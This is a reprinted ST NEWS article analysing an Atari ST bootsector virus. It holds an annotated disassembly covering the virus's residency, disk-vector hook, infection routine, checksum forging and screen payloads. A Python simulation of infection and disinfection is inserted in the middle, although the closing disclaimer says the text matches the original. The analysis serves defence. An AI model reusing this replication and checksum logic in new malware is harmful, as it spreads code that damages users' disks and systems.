THE ST'S VIRUS PART III by Richard Karsmakers
Guess what: the biggest nonsense about viruses was produced in
the month after the launch of the second article about viruses in
ST NEWS. Was I so dumb as to think that I had told everything
about the virus? Probably the guys of the "Aticom" user group in
Nijmegen hadn't read any of the articles, for they advised their
members to throw away all infected disks (!). Even formatting, so
they added, wouldn't be enough anymore. Well, I don't think I
need to say that this is the biggest nonsense I have ever heard!
Why do people write virus killers? To make people throw away their
disks? No, Aticom! Using a virus killer suffices in all cases
where an infected disk is concerned: a bootsector virus lives in
the first sector of the disk and nowhere else, and a killer that
overwrites the code in that sector (leaving the BPB and the files
alone) removes it. Even formatting is not necessary, let alone
total destruction of the disk. It would be a pity if someone who
had just spent months programming found a virus on his work disk.
If he had to throw the disk away, he would be a sad man...
Luckily for him, virus killers exist.
The most stunning news in this issue of ST NEWS is the fact that,
next to the old bootsector virus and the link virus, a new
bootsector virus has been discovered. A documented listing is
added so that you can see exactly what it does...
03A80C BRA $03A82C
The BRA at offset 0 of the sector skips the OEM name, serial number, BPB and the counter word at offset $1E ($3A82A), and lands on the installation code:
03A82C MOVE.L $042E,A1 !phystop to A1
03A830 SUBA.L #$00000300,A1 !Subtract $300: A1 = phystop-$300
03A836 LEA $03A80C(PC),A0 !Start of the bootsector (this routine)
At $3A80C, the bootsector is in memory at the moment
03A83A MOVE.W #$01DF,D5 !Loop counter $1DF
03A83E MOVE.B $00(A0,D5.W),$00(A1,D5.W)!Copy sector to phystop-$300
03A844 DBF D5,$03A83E !$1E0 bytes (offsets $1DF down to 0)
03A848 CLR.W $0006(A1) !Clear the infection counter at +6
03A84C MOVE.L $0476,$0002(A1) !Store old hdv_rw vector at +2
03A852 ADDA.L #$000000D4,A1 !Address of the hook: +$D4
03A858 MOVE.L A1,$0476 !Set new hdv_rw
03A85C RTS !Ready!
At $300 below the physical top of RAM (just past the end of the
32000-byte screen, which TOS puts at phystop-$8000), the virus is
now installed:
-$300 The BRA to the virus
-$300+2 The address of the old HDV_RW
-$300+6 The infection counter, cleared at installation
-$300+$1E The generation counter that is written to every infected disk
-$300+$D4 The adapted HDV_RW routine
03A85E LINK A6,#$FE00 !Reserve $200 bytes on the stack: one sector
03A862 MOVE.L A7,A5 !A5 = sector buffer
03A864 MOVE.W #$0008,D0 !XBIOS 8 = Floprd
03A868 BSR $03A8C0 !Read bootsector of the new disk
03A86A CMP.B (A5),D6 !First byte = D6 (=$60, the BRA.S opcode)?
03A86C BEQ $03A8BC !Equal: already present, skip
On the address in A5, the bootsector of the new disk is present
03A86E MOVE.L A5,-(A7) !Buffer address on stack
03A870 LEA $03A80C(PC),A0 !Routine start in buffer
03A874 MOVE.W $03A80C(PC),(A5) !Put $601E at bufferstart
03A878 MOVE.W #$01C1,D5 !$1C1 in D5
03A87C MOVE.B $1E(A0,D5.W),$1E(A5,D5.W)!Routine to buffer
Now the virus is copied from offset $1E to $1DF ($1C2 bytes) into
the buffer where the bootsector of the new disk resides. Bytes
$02-$1D of the new disk (OEM name, serial number and BPB) are kept,
so the disk stays readable after infection
03A882 DBF D5,$03A87C !Copy $1C2 bytes
03A886 CLR.W D7 !D7=0
03A888 CLR.W $01FE(A5) !Clear the last word of the sector (checksum slot)
03A88C MOVE.W #$00FF,D5 !$FF to D5
03A890 ADD.W (A5)+,D7 !Make checksum in D7
03A892 DBF D5,$03A890 !Over $100 words = the whole sector
03A896 MOVE.W #$1234,D0 !Subtract sum from $1234
03A89A SUB.W D7,D0
03A89C MOVE.W D0,$FFFE(A5) !Store it in the last word (A5 now points past the sector)
03A8A0 MOVE.L (A7)+,A5 !Buffer address back in A5
The checksum is now in the last two bytes of the bootsector
buffer: the 256 words of the sector add up to $1234, which is
exactly what TOS checks before it executes a bootsector. The
image is now infected AND executable
03A8A2 MOVE.W #$0009,D0 !XBIOS 9 = Flopwr
03A8A6 BSR $03A8C0 !Write the buffer back as bootsector
03A8A8 TST.L D0 !Error code?
03A8AA BMI $03A8BC !Negative? Exit
When this is negative, there was an error writing (e.g. a write-
protected disk), and the two counters below are left alone
03A8B0 ADDI.W #$0001,$001E(A0) !Increment the generation counter at offset $1E
03A8B6 ADDI.W #$0001,$0006(A0) !Increment the infection counter at +6
03A8BC UNLK A6 !Memory back
03A8BE RTS
Routine to read/write the bootsector (XBIOS Floprd/Flopwr; the
parameters are pushed in reverse order)
03A8C0 MOVE.W #$0001,-(A7) !1 sector
03A8C4 CLR.W -(A7) !Side 0
03A8C6 CLR.W -(A7) !Track 0
03A8C8 MOVE.W #$0001,-(A7) !Sector 1
03A8CC MOVE.W $03A91E(PC),-(A7) !Device number
03A8D0 CLR.L -(A7) !Filler
03A8D2 MOVE.L A5,-(A7) !Buffer
03A8D4 MOVE.W D0,-(A7) !$8/9, Floprd/Flopwr
03A8D6 TRAP #14 !Execute it
03A8D8 ADDA.L #$00000014,A7 !Pop the $14 bytes of parameters
03A8DE RTS !Return
The new disk is now infected. The following routine is the
resident hook: hdv_rw ($476) is vectored to this address, +$D4
from the start of the installed copy
03A8E0 LEA $03A91E(PC),A0 !Get buffer address
03A8E4 MOVE.W $000E(A7),D0 !Get device number from the hdv_rw arguments
03A8E8 MOVE.W D0,(A0) !Put in buffer
03A8EA ANDI.W #$FFFE,D0 !Clear bit 0: devices 0 and 1 both give 0
03A8EE BEQ $03A8F6 !To 3A8F6 if dev=0/1 (floppy A or B)
03A8F0 MOVE.L $03A80E(PC),A0 !Old HDV_RW vector (offset +2)
03A8F4 JMP (A0) !Execute it
Only floppy accesses get this far
03A8F6 MOVE.W $000C(A7),D0 !Logical sector number in D0
03A8FA CMPI.W #$000B,D0 !$0B = 11, the first root directory sector?
03A8FE BNE $03A8F0 !Not the directory: pass through untouched
03A900 MOVEM.L D0-A6,-(A7) !SAVE registers
03A904 MOVE.W $03A812(PC),D0 !Infection counter (offset 6) to D0
03A908 CMPI.W #$0005,D0 !Counter already above 5?
03A90C BLE $03A910 !5 or less: skip the payload
As long as the counter is 5 or less (this resident copy has
infected at most five disks), the virus only checks if it's
present on the disk and multiplies if needed. Once the counter
exceeds 5, the screen is scrambled or something of that kind
first, and then the check and the multiplying follow anyway
03A90E BSR $03A920 !Scramble screen
03A910 MOVE.B #$60,D6 !$60 (the BRA.S opcode) in D6
03A914 BSR $03A85E !Check for virus, infect if absent
03A918 MOVEM.L (A7)+,D0-A6 !Get back registers
03A91C BRA $03A8F0 !Execute old HDV_RW
03A91E $00, $00 !Word buffer for the device number
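To make the replication and trigger logic above concrete, here is a Python model of the sector format and of the hdv_rw hook. It is an example added for this edition, not code from the original article and not Atari code: it reproduces the $1234 bootsector checksum from $3A886-$3A89C, the infection of a victim sector (BRA.S $601E at offset 0, the generation word at $1E, the code from $20, BPB left intact), the decisions of the hook (floppy drives only, logical sector 11, payload once the counter at +6 exceeds 5, skip if the first byte is already $60, no counter bump on a failed write) and the disinfection a virus killer performs instead of formatting: wiping the code while keeping the BPB and making the sector non-executable. The BPB bytes and the virus body used as input are constructed stand-ins, not the real virus; the class and function names are my own.

```python
import struct

SECTOR = 512
MAGIC = 0x1234           # TOS runs a bootsector only if its 256 big-endian words sum to $1234
CODE_START = 0x1E        # $00-$01 BRA, $02-$07 OEM, $08-$0A serial, $0B-$1D BPB, code from $1E
BODY_LEN = 0x1C0         # the virus code proper: offsets $20-$1DF
ROOT_DIR_SECTOR = 11     # logical sector $0B: first root-directory sector on a standard ST floppy
TRIGGER_AFTER = 5        # the payload runs once the resident counter (offset +6) exceeds 5

# Constructed sample input (not data from the article): a clean DS/DD bootsector with a
# filled-in BPB and an empty code area, and a stand-in virus body made of RTS opcodes.
CLEAN_BOOT = bytes(0x0B) + bytes.fromhex("0002020100027000a005f90500090002000000") + bytes(SECTOR - CODE_START)
VIRUS_BODY = b"\x4e\x75" * (BODY_LEN // 2)


def word_sum(sec: bytes) -> int:
    """Sum of the 256 big-endian words, as the loop at $3A890-$3A892 computes it."""
    return sum(struct.unpack(">256H", bytes(sec))) & 0xFFFF


def is_executable(sec: bytes) -> bool:
    return len(sec) == SECTOR and word_sum(sec) == MAGIC


def fix_checksum(sec: bytearray) -> None:
    """$3A888-$3A89C: clear the last word, then store $1234 minus the sum of the rest there."""
    sec[0x1FE:SECTOR] = b"\0\0"
    sec[0x1FE:SECTOR] = struct.pack(">H", (MAGIC - word_sum(sec)) & 0xFFFF)


def is_suspicious(sec: bytes) -> bool:
    """Fingerprint taken from the listing only: executable and starting with BRA.S $601E."""
    return is_executable(sec) and bytes(sec[0:2]) == b"\x60\x1E"


def neutralise(sec: bytes) -> bytearray:
    """What a virus killer does instead of formatting: wipe the code, keep bytes $02-$1D
    (OEM name, serial, BPB) and make sure the sector no longer sums to $1234."""
    out = bytearray(sec)
    out[0:2] = b"\0\0"
    out[CODE_START:SECTOR] = bytes(SECTOR - CODE_START)
    if is_executable(out):           # only if the BPB words alone happened to sum to $1234
        out[0x1FF] ^= 0x01
    return out


class Floppy:
    """A disk as the hook sees it: its bootsector, and whether Flopwr would fail on it."""
    def __init__(self, boot: bytes, write_protected: bool = False):
        self.boot = bytearray(boot)
        self.write_protected = write_protected


class ResidentVirus:
    """State of the copy installed at phystop-$300."""
    def __init__(self, body: bytes, generation: int = 0):
        assert len(body) == BODY_LEN
        self.body = body               # bytes $20-$1DF of the virus bootsector
        self.generation = generation   # word at offset $1E, copied to each victim, then incremented
        self.counter = 0               # word at offset +6, cleared at install (CLR.W $0006(A1))
        self.payloads = 0              # how often the screen routine at $3A920 would have run

    def infected_image(self, victim: bytes) -> bytearray:
        """$3A86E-$3A8A0: victim sector with BRA.S $601E, offsets $1E-$1DF replaced, checksum fixed."""
        buf = bytearray(victim)
        buf[0:2] = b"\x60\x1E"                          # BRA.S to offset $20, over the generation word
        buf[CODE_START:0x20] = struct.pack(">H", self.generation)
        buf[0x20:0x20 + BODY_LEN] = self.body
        fix_checksum(buf)
        return buf

    def hdv_rw(self, dev: int, recno: int, disk: Floppy) -> str:
        """$3A8E0-$3A91C: what happens on one hdv_rw call before the old vector is taken."""
        if dev & 0xFFFE:                  # ANDI.W #$FFFE: only devices 0 and 1 (floppies)
            return "passthrough"
        if recno != ROOT_DIR_SECTOR:      # CMPI.W #$000B: only directory accesses
            return "passthrough"
        if self.counter > TRIGGER_AFTER:  # BLE $3A910 skips the payload while counter <= 5
            self.payloads += 1
        if disk.boot[0] == 0x60:          # CMP.B (A5),D6: first byte is already a BRA.S
            return "already present"
        image = self.infected_image(bytes(disk.boot))
        if disk.write_protected:          # Flopwr returned negative: counters untouched
            return "write failed"
        disk.boot = image
        self.generation += 1              # ADDI.W #1,$001E(A0)
        self.counter += 1                 # ADDI.W #1,$0006(A0)
        return "infected"


if __name__ == "__main__":
    virus = ResidentVirus(VIRUS_BODY, generation=3)
    disk = Floppy(CLEAN_BOOT)
    print(virus.hdv_rw(0, ROOT_DIR_SECTOR, disk), is_executable(disk.boot), is_suspicious(disk.boot))
    print(virus.hdv_rw(0, ROOT_DIR_SECTOR, disk))
    print(is_executable(neutralise(disk.boot)))
```

Run against the constructed sector, the model shows the two things the listing hides in offsets: the victim's BPB survives infection (so the disk keeps working and nobody notices), and the payload starts on the seventh directory access of a session only after six successful infections, which is why an infected machine can look healthy for a long time.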
Things go wrong here
03A920 CLR.W D0 !Clear D0
03A922 MOVE.B $0465,D0 !lowest byte of _vbclock
03A926 ANDI.B #$07,D0 !Only 3 lowest bits
D0 now contains a pseudo-random number between 0 and 7. This number
specifies which routine will be called
03A92A LEA $03A9DA(PC),A0 !Offset table
03A92E MOVE.B $00(A0,D0.W),D0 !Offset to D0
03A932 LEA $03A93A(PC),A0 !First routine address
03A936 ADDA.W D0,A0 !Add D0 to it
03A938 JMP (A0) !Execute it
Routine #1 (offset=0) !Invert the screen
03A93A MOVE.L $044E,A0 !_v_bas_ad to A0
03A93E MOVE.W #$1F3F,D5 !$1F3F to D5
03A942 EORI.L #$FFFFFFFF,(A0)+ !Invert screen
03A948 DBF D5,$03A942 !$1F40 longwords = 32000 bytes, the whole screen
03A94C RTS
Routine #2 (offset=$14) !Scroll screen
03A94E MOVE.W #$003F,D0 !$3F in D0: $40 passes
03A952 MOVE.L $044E,A0 !_v_bas_ad to A0
03A956 MOVE.W #$3E7F,D5 !$3E7F to D5
03A95A ROL (A0)+ !Rotate each word one bit to the left
03A95C DBF D5,$03A95A !Over $3E80 words = the whole screen
03A960 DBF D0,$03A952 !Repeat $40 times
03A964 RTS
Routine #3 (offset=$2C) !Scramble screen
03A966 BSR $03A96A !Swap the halves, then fall through and swap them back
03A96A MOVE.L $044E,A0 !_v_bas_ad to A0
03A96E MOVE.L A0,A1 !Also to A1
03A970 ADDA.L #$00003E80,A1 !Add $3E80 (16000) to A1: second half of the screen
03A976 MOVE.W #$3E7F,D5 !$3E7F to D5
03A97A MOVE.B (A0),-(A7) !Swap one byte of the first half
03A97C MOVE.B (A1),-(A7) !with one byte of the second half
03A97E MOVE.B (A7)+,(A0)+ !via the stack
03A980 MOVE.B (A7)+,(A1)+
03A982 DBF D5,$03A97A !$3E80 bytes
03A986 RTS
Routine #4 (offset=$4E) !Tutti Frutti
03A988 BSR $03A93A !Invert screen
03A98A BSR $03A94E !Scroll screen
03A98C BSR $03A966 !Skramble screen
03A98E RTS
Routine #5 (offset=$56) !20 times screen invert
03A990 MOVE.W #$0013,D0 !$13 in D0: 20 passes
03A994 BSR $03A93A !Invert screen
03A996 DBF D0,$03A994 !20 times
Routine #6 (offset=$60) Routine #5 has no RTS and falls through into this one
03A99A BSR $03A96A !Swap the screen halves
03A99C MOVE.W #$0096,D0 !$96 = 150 ticks of 5 ms (0.75 s)
03A9A0 BSR $03A9CC !Pause
03A9A2 BSR $03A96A !Swap them back
03A9A4 RTS
Routine #7 (offset=$6C) !Move screen memory
03A9A6 ORI.B #$10,$FF8201 !Video base high byte OR $10: screen base moves up by $100000
03A9AE MOVE.W #$00C8,D0 !$C8 = 200 ticks of 5 ms (1 s)
03A9B2 BSR $03A9CC !Pause
03A9B4 ANDI.B #$EF,$FF8201 !Put it back
03A9BC RTS
Routine #8 (offset=$84) !Make a sound
03A9BE PEA $03A9E2(PC) !Pointer
03A9C2 MOVE.W #$0020,-(A7) !XBIOS $20 = Dosound
03A9C6 TRAP #14
03A9C8 ADDQ.L #6,A7 !Correct stack
03A9CA RTS
Pause (D0 = number of 5 ms ticks)
03A9CC MOVE.W $04BC,D1 !Low word of _hz_200 ($4BA.L)
03A9D0 ADD.W D0,D1 !Add D0 to that: target time
03A9D2 CMP.W $04BC,D1 !Wait until the counter has passed the target
03A9D6 BGE $03A9D2
03A9D8 RTS
Offset bytes (routines 1-8)
03A9DA $00, $14, $2C, $4E, $56, $60, $6C, $84
Dosound data
03A9E2 $07, $FE, $08, $0F, $81, $00, $04, $00, $FF, $00
Register 7 = $FE: channel A tone on; register 8 = $0F: channel A at
maximum volume; $81,$00,$04,$00: step register 0 (channel A pitch)
by 4 each tick until it reaches 0, i.e. a sweeping sound; $FF,$00:
end of sound
I am very sorry that the addresses are a bit awkward, but this is
a disassembled listing of a virus bootsector as it sat in a disk
monitor's sector buffer. Hence the strange addresses.
If this virus is an example of the trend among Atari ST users,
it's bad news. It might be that this particular virus is
relatively harmless, but it still IS a virus! Add to that the
rumour that Data Becker is publishing "The Big Virus Book", and
one tends to feel rather depressed....
A new version of the "Virus Destruction Utility" is talked about
in the "VDU Update" article. Please refer to that if you want to
take part in the battle against viruses - which you should!!
Disclaimer
The text of the articles is identical to the originals like they appeared
in old ST NEWS issues. Please take into consideration that the author(s)
was (were) a lot younger and less responsible back then. So bad jokes,
bad English, youthful arrogance, insults, bravura, over-crediting and
tastelessness should be taken with at least a grain of salt. Any contact
and/or payment information, as well as deadlines/release dates of any
kind should be regarded as outdated. Due to the fact that these pages are
not actually contained in an Atari executable here, references to scroll
texts, featured demo screens and hidden articles may also be irrelevant.